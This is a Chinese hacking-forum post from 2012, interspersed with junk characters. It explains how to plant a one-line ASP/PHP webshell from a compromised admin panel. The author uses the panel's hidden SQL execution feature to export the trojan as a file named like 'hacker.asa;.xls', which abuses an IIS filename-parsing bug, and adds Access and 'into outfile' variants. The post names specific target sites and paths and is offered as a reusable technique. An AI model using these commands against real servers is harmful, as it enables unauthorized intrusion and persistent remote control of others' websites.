好不容易进了后台,发现啥上传啊。备份啊多木有。$ Y8 [9 S" J8 U& t% c2 O5 k
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
9 ]) X7 P, q. O; c4 @$ @文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
: k8 q, O0 n9 ~ S# d* Z; d$ @然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:0 `5 F1 O0 p% _
1.create table cmd (a varchar(50))
' e* r5 |! R5 s2.insert into cmd (a) values (‘‘)& e' `6 u8 g( I+ H% i* z% u
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd0 n) f8 a0 y2 Q
(把表cmd的内容导出为物理路径的一个EXCEL文件)
) j M: w2 S$ j- [9 G; P8 X4.drop table cmd
0 a/ b/ w9 F/ D% v) B! A, ]3 ^) ^! N利用IIS的BUG成功拿到了WEBSHELL。9 `4 ^( H6 f' |7 ~
: u4 J" ^4 ~& `9 ~# l0 Y
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话5 ]% |* z, }* `; ^
4 Z. B! Q9 B; G: o7 \ SQL语句意思解释:' s& p% Q4 c* H: z
第一句* K) R4 W9 z7 X. }- E* o" A- w
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
6 M2 M- T2 |8 F
! G* W% e; ]# R/ u2 n, x 第二句
) `: g R7 t# v( J* H9 | 在表cmd的a字段插入一句话木马/ F: P; R: K/ m. `' R
第三句
% o* u3 I2 \9 F) @' o 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件6 O: z7 V$ G: n( A- M/ z
0 `4 Y" Q' M. \ 第四句/ R( ~. [& Y0 B. H- d6 u) T
删除建立的cmd表: G) Y3 d0 _/ S- U1 H% x
4 O: I q( v; o( v2 Y
以下内容为测试:3 e; _4 V( M2 |& D
Access利用后台SQL执行命令功能导出WebShell:. H% Y! _; ^, q. W4 E/ \7 |& y5 }
这个更简单:( G1 g9 B$ C- i$ A$ v" a
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
2 v: m1 A' [0 j/ `$ R 或者$ j+ t( l8 ~7 F
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]$ @; P$ q# d8 u2 H
' R' `0 }7 } V2 g$ Z& b 后台有执行SQL语句功能(vote为已知表段)
3 S; c9 u, p5 i H, J- R* l, Y7 C 希望对大家有所帮助拿shell的又一个思路
& I' Y3 p% U6 k8 j3 F# C( ~/ Q |
发表于 2012-9-13 17:53:58
收藏
支持
反对